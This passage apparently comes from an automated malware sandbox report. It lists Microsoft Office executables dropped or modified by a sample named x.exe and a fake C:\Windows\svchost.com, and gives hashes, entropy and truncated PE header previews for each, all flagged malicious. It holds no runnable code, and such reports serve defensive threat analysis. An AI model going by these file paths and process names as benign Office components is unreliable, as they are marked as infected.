                                      SSDEEP:12288:NM/Of/Bboj+clWnIKgrP6TFPLNWuX4Pemn3oi8ky9Q8WSe/aSqizuO1qukdQAPnQ:u8JgryFPLNWuX40RulAPn1OcnGVNfffl
                                      MD5:7A16124F85B72495EE1FE9F639B9231C
                                      SHA1:6BEC7715F9FBA90EA72176E9211A7D2B66CD2711
                                      SHA-256:6EC71D7BD6697603174EF482893A6AB891B7C056F407AB7071C4C05B905D3360
                                      SHA-512:55B7DE7FF27C529E2A13E37C8A5973592865D19FF493F01C6413F6D2921EB08A6225614A9B1A0CF9701397EFF8917C1DB84C3789A915FBDBDC0ACF9BC63ABA17
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):150416
                                      Entropy (8bit):6.494866167569868
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCsQPtLW7twRxI5mc5TNN3AsdVgNwihwT3RqEM6ZOfHXb42:PusQMzhdV0nh4Hof7
                                      MD5:B09DEFF61F6F9FE863E15CCEDDC41BD3
                                      SHA1:A0E6EF8B3C816C2D588E9E77D08B96D3D0CB097D
                                      SHA-256:2009879148C3ED6E84842B5B6FADE5C90796432F9661AEAB1F984707131A8421
                                      SHA-512:08009C92E6B4E652CD6516DCE9A4E88329A7A95C8F423C224FB15B983F1F3E8B239C7FDCAF0A567DE409756B1F813099DF1F5EA26B1B1D6B66D852A2716DE79E
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):264576
                                      Entropy (8bit):6.638841934755568
                                      Encrypted:false
                                      SSDEEP:6144:Pug872jsLuLnPo2TTHswP2TGz3FUCHySYI:/+2jsLuT3MfTGW5I
                                      MD5:E62A03187D8ED6B506E1D2B2273F2E0A
                                      SHA1:4579EAD2B0EF021621D994D6CF7CEB0FB1C4D03B
                                      SHA-256:B23D2592ECF09B750E142995632EA34F39F835664B728EA5A719C4734403A6FD
                                      SHA-512:0EF9AF76CA2A09FB8DF0C709881E496D19A35767DBA00817F9190FFCA263591462ABB3CAFF0DDC5AF4578344E0DF10DCF3910CA7CAC8F5E360B556F0CC6EF414
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):149920
                                      Entropy (8bit):6.084594176200221
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCWweqz1lezmtJwzojsKyyJFGgHZ//rHzbJOxqjQ+P04wsZLC:zr8WDrCSqzXe0wSyyJFD//Hb9r8WDrC
                                      MD5:4E2CD5ACF5D762E427BEB75640D7A224
                                      SHA1:0CCAA4DBBD6BD2176B763FB517391D480B699684
                                      SHA-256:443037E077141D002BC93EBC958348C7B1744F59A82C7579CA91A122D0C457B5
                                      SHA-512:E9106F34A7269A317CC3DCDD06ADC2BFF7E20270D9D4DDB7D4D4E4282367C956FC0577F6791CF516AC2CB28502A1B27B520AAA1502EBCC9DA30475788C236152
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):662600
                                      Entropy (8bit):5.99949921629127
                                      Encrypted:false
                                      SSDEEP:12288:hpo/FEVciSJJtH4PoR6moWEBfQLxZPhEx7xgtV2hv4tkYUK2tlIqR7lmNK/IKrtK:UFEWi4JtH4PoRfoFIxZPk0NKbB0R
                                      MD5:972F426D9B56B37005FDABC7D334747B
                                      SHA1:140458C19EDCD7C4B75586BB4DBA5930D5693DC5
                                      SHA-256:5052A0F40917AF50A319DD1BC4C39A62289A0723645AEF4A0DC8DBA0DF0391D9
                                      SHA-512:A4D3E9EC84C8111423CCD978081A2E95C268A177801F6B3E8F81965BE709F1F062C035A774BF9C7A706FAB67F988D3E88FC87E233C449D0179545A569EAC9DA8
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):260560
                                      Entropy (8bit):5.442716114061443
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCl4ZAh7ULoQdHBjw8Q2pFj4+W1ISYpksZmRohnonRBfTjzJEthEWV:PulPfQdhMuj4VM8imPjGthEWV
                                      MD5:1C9E01BBA5F422C56C9F336EB663411A
                                      SHA1:51AF077DD40C9407BBF10ECF3C8CBF438A0FE69F
                                      SHA-256:64397891801142AE1DADB7B7E7C9D72624BCE616EA76E21938ABFD415CF2BB54
                                      SHA-512:F1B54EFC6744DE37E2849B0B9E69551ADFA42E8E10B73FAA0409619BBC03C0D48077C103D055CB78EB8744EC2D621EA216BEA7E8376CC36C123954BB8A00573F
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4316200
                                      Entropy (8bit):3.92031883071557
                                      Encrypted:false
                                      SSDEEP:98304:TYN3nsBQ5ghvEyqf/whWovz9hRJ5RbisrbdsPO9jXsw:kN3nsBcghvEyqf/whxz9hRJ5Rbisrbdr
                                      MD5:4EDB603EF8AE8C97CDEDB9DD45B456FC
                                      SHA1:6916AD9547B437DA6AE9EA8243F6EB3645835406
                                      SHA-256:0EFCF2F2D3372AA05C67283CCCD02063AB8F4B60381598E71263B92C73B2E451
                                      SHA-512:55CB5D6B99A198B8A27943AD496BCDF8E07CE85A0E655957A8CFB87D2C184CFF10FC8F6EB7EABB470FD56C17B2C1D36931E16437ADE84A87F8CC46FE9DA8AF9D
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):124056
                                      Entropy (8bit):5.717272734704383
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCCwu7mzj9zNtP9zNps8Q:zr8WDrCCLmzj9P95psb
                                      MD5:69A2BD4BD404C78D413DAD66D32597C3
                                      SHA1:7663FEFC203E918AA0A6618A4548B273E4AA2893
                                      SHA-256:5AEAF364B4159E6603DCC5AC220765A83033E62679405C8141A4C209F89BDF6F
                                      SHA-512:913C45F67F749ECAC269FBCEBDDAB2A274F274DC7FE0376FEB92C8438493FC9B8B528C48962C27B05710C8D1B48E22300002A9D7075D8FD3DEA1680C0772E9B9
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):358336
                                      Entropy (8bit):4.510772603696019
                                      Encrypted:false
                                      SSDEEP:6144:PuEyUkKOEEIK128d2VKjw0EYsfZJnPmTuJjac2a51lHpLszc/kzY56Y:Rx/B/kib
                                      MD5:827D7E2C0648A1E8647744C90DDC13B1
                                      SHA1:94CF03EBCDEAECECF5A4438471AD452C8FBD1699
                                      SHA-256:AD4CE68BE5E3737235F7A3D3F6516B6EBF04209AA5BF2A1E929FA7FAB5F78460
                                      SHA-512:41C3A9FD99483B67E99E53BA7A706B6AD3F95268F09CE15932DB08CD42ECA01AFD6D05B5FBF2947A3BAE2D01EC9D629B9C269A5B67B34853FDB83FA40FC84581
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):763032
                                      Entropy (8bit):4.114589316949574
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCcwRnjnzhCiXXXXXX1AzZwAazTwdOLxN1IHO:PucwRnj7XXXXXXSzuz8OZ
                                      MD5:F898708BB5A98C216A5BDC4D8AB55F31
                                      SHA1:22F8606DFCC66EAA9348FCBE454AD077C1D6BD48
                                      SHA-256:9660432E007E774265D438B48100B8D6F0A98DC028D0208720FF7A76C72EA115
                                      SHA-512:2518C501205897BF611DD43A462AE4F689E1C1587BD2F5F15B33CDB63CFB367A402FB4BB61FFE7A7EC23AC564DA601060011AE6B82CDB8D2E565D14F7C72505F
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):895120
                                      Entropy (8bit):2.964304827256967
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCgfCEq7tOxIfMFzCEpAm/4rx7z1arf+9:PuJz8w
                                      MD5:02B9A3A76F77E057424B70187B54E8BE
                                      SHA1:3A659E76872EE3E20BA10F11D291D0BAC6EE0F66
                                      SHA-256:7B044969828A96DC142FFEDEB7922A876C4CC5CB4DC073C5CA47B868D7315C4B
                                      SHA-512:26D9CC3CA41BF1AA592A914DB7BDC82D7761962D7AECA6BDFC38047B39D6E1081484B5A90C009DE01D41F9CA45E54570B15AF6F10BD7E9CFD985F42B3ACF6E6E
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1082008
                                      Entropy (8bit):3.7732979147875136
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCyo4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:Puv243xmQm59UtUSfz3
                                      MD5:9139C2A0B4A37763278B42FA33970AD6
                                      SHA1:4667B3983C739687FC50DF651F1633E1EC2DBCFF
                                      SHA-256:EF91D1E371D92DBCAA676684653EE1892F901D4365F922BD6BD5833B5CD0488F
                                      SHA-512:E5CE975D51D56CD5A2E4707E9E739CC68C1E297CFB030AADEB114FB61D57BC515759E3CFE89332C91F326E23EC49BE5453DDF9F6EDE550F55DCE3F8D3BF53BC5
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):105440
                                      Entropy (8bit):6.077342901333925
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCqjhzxwKehzgt5t1D:zr8WDrCMhLehEthD
                                      MD5:3041D08F176DA6C15446B54A11BA7772
                                      SHA1:474A99A64B75751BBD04B10E7F7F2D9D43F12E6E
                                      SHA-256:3E6EB6EE327A6054BA3BE5F55F3481FE3436AB3CF0F0D6FE99976472CDD02631
                                      SHA-512:216E38ACBCAC94F24144566415DFB6EBC94A16E93B44E1F45B79D982523B8F4A6A2FC1AD5843C336998D30F2EBD39ACE559F93EAD1AEE696A81032CB5641202D
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):537536
                                      Entropy (8bit):4.940165777929305
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCKPMMRMMMmMMMvMMMwMMMNMMMWMMM3MMsewVOOMzMMvMMOMMMJMM2MMQMe:PuJwVR6V7byjUWAZyVVdz8eEdGo
                                      MD5:AB9127D17FA9B572EC2BF5C8EE8BB7CD
                                      SHA1:D2096A5FB72A1E2DF9B21A13997BD4393BF7C84F
                                      SHA-256:4ED4B79EF07E11CD4D7AF823CC595686DD4ECF17FD3609B483AB1F5A466AF4EC
                                      SHA-512:8778F741473F139108DB40DD2897BA145C44C4B4EED110E0C8142361225FF6660875A668A65BC6A8EB5941C3DCF75719C7C0B1C6F64D0BCD37F4C443F2B2548C
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1271952
                                      Entropy (8bit):4.08276153361242
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCf3ppPpNpDpspp/pCp0pmppdpspppRppMpLp0ppppbpQp2pphpSpXpQppt:PuIKQSNdhnSzv
                                      MD5:4F7B544E82176A6591B213634C9DCBBC
                                      SHA1:EAB0382F33BD32FBF05351F750014EB814CDFC07
                                      SHA-256:3E8E1E8C74AC39D6663C089A3FADE84F9852F70325981F037E9CA111036448CA
                                      SHA-512:C339CC8DA7001494E3D2855632837408784412412630507E52A165AB42FCE29CF0D0115D3C3475ED231B2E4A14025464FC6DA85F4AD3227822B6855117D7C604
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4099760
                                      Entropy (8bit):3.71770959793901
                                      Encrypted:false
                                      SSDEEP:12288:+BKs7fvZIFpCYVIVN2mGsb8HtVLaHw3j4cLbUBRjLFP29DyZbT9gb/m06aCzE6h9:+BKszX0FjOeblHiled/k
                                      MD5:44D035172880CB494A431B5151307A85
                                      SHA1:F754A916F702B3A4AE738978E6CAF9ED103977F7
                                      SHA-256:60DBDA9BFE2A3A683DE925697F23962303AADA724144B70C50D5D4D915A73EDA
                                      SHA-512:1916ED72E59480F3585160231E3DCC459DCBFB3BBF126C7456A3135B9A08150A3B5512F5469CE7B60E2CFEAFD52B06157DA821367E83184CB2D54FE1BAF1D52C
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1273488
                                      Entropy (8bit):4.318016696735314
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC56bZt+ATS583ONo4aezJ8ZfqiA:Pu56bZtazB
                                      MD5:8014D7B281477BA8D20CF01253894A75
                                      SHA1:847240AFA115E972C2115BF02965C89013BFEB8D
                                      SHA-256:D78C4FE0CB9E9552A8073F6F60F5CE2D1BC9306855FF52788B8DC542C62C56B0
                                      SHA-512:F66439985974204855DC81E3E43C9CECD19914DE11C72BB6EFD5CB0BC824198F0904ED5CC33975C45A02BDF0EABB979594B1A0CD793EF77A99C507CDB4F423F9
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):124056
                                      Entropy (8bit):5.717272734704383
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCCwu7mzj9zNtP9zNps8Q:zr8WDrCCLmzj9P95psb
                                      MD5:69A2BD4BD404C78D413DAD66D32597C3
                                      SHA1:7663FEFC203E918AA0A6618A4548B273E4AA2893
                                      SHA-256:5AEAF364B4159E6603DCC5AC220765A83033E62679405C8141A4C209F89BDF6F
                                      SHA-512:913C45F67F749ECAC269FBCEBDDAB2A274F274DC7FE0376FEB92C8438493FC9B8B528C48962C27B05710C8D1B48E22300002A9D7075D8FD3DEA1680C0772E9B9
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):2970664
                                      Entropy (8bit):3.852513127476973
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCbKd0qVmvzC1SvXKo3NzbsZ6DdIAZcbEcofUnpfRII8Lp9qgN3WJp0Rf5F:PuO/V/CfDhNG5sMXjjzmEPoL
                                      MD5:7AF0A120B754A36602AC1A7F2B3C66D1
                                      SHA1:D7870589638553E4D6DDD2E96F47CE3257CA4386
                                      SHA-256:548A4FDDCBEEF643B1CEA7FEA80E10EF7A98342223AA0D03E2D3F0E090732FA3
                                      SHA-512:9673C807E0C42B9C96E7A2EDE5B905E113B1C3A9C082FEB06AF7AA507238F35B4A376DCDB78711AB59A71845AA85C8B6A0ACEC24FF1EA0C08D0DA5AAAE1A5851
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3531712
                                      Entropy (8bit):3.7796637413670093
                                      Encrypted:false
                                      SSDEEP:6144:Pu8sSR7PYKzz38YwZItvsDu7DbDhRAUzHW:5PYmLWSDBy
                                      MD5:6DC25D566989B3C8B314D0A51CE264BB
                                      SHA1:91A91837034A68BC5327132381D4A060B96B80AC
                                      SHA-256:7B0D191A69BA4A30A5F9BA4914F61B4514B30507467858E595353E158E20B62C
                                      SHA-512:213F26AC7407CDC444968465B5F2153DBF4D0B1113ECFFC7CBD936BCD4D0F1B024C5EB294EB1630D986BC022726F622950B8187304385FB81CA234E0E6D6D9A4
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4319272
                                      Entropy (8bit):3.812301874725472
                                      Encrypted:false
                                      SSDEEP:6144:PuEmRfvlTZY/C3ul0ywb/uXMo+YJ7M41zXLWIB:3+6M+595B
                                      MD5:FB10E76D72E74609F207999494FFEEC1
                                      SHA1:9AE189189878E6B4E84FC1EA6BD6CC861E25BD68
                                      SHA-256:1594E068581C29E6422B82053DC5D2F1E805E190E7B12F9EFE8BE6C2D6E8E4DA
                                      SHA-512:78F4F601BB7E5B5696B615B66F701DAF6DE2E984C19D502207A786D5E6784E5D3C7474D05EE282227EB19EDA91A5BCEF3698B0F02FB0630003BAF88AE75C2136
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1082008
                                      Entropy (8bit):3.7732979147875136
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCyo4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:Puv243xmQm59UtUSfz3
                                      MD5:9139C2A0B4A37763278B42FA33970AD6
                                      SHA1:4667B3983C739687FC50DF651F1633E1EC2DBCFF
                                      SHA-256:EF91D1E371D92DBCAA676684653EE1892F901D4365F922BD6BD5833B5CD0488F
                                      SHA-512:E5CE975D51D56CD5A2E4707E9E739CC68C1E297CFB030AADEB114FB61D57BC515759E3CFE89332C91F326E23EC49BE5453DDF9F6EDE550F55DCE3F8D3BF53BC5
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1082008
                                      Entropy (8bit):3.7732979147875136
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCyo4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:Puv243xmQm59UtUSfz3
                                      MD5:9139C2A0B4A37763278B42FA33970AD6
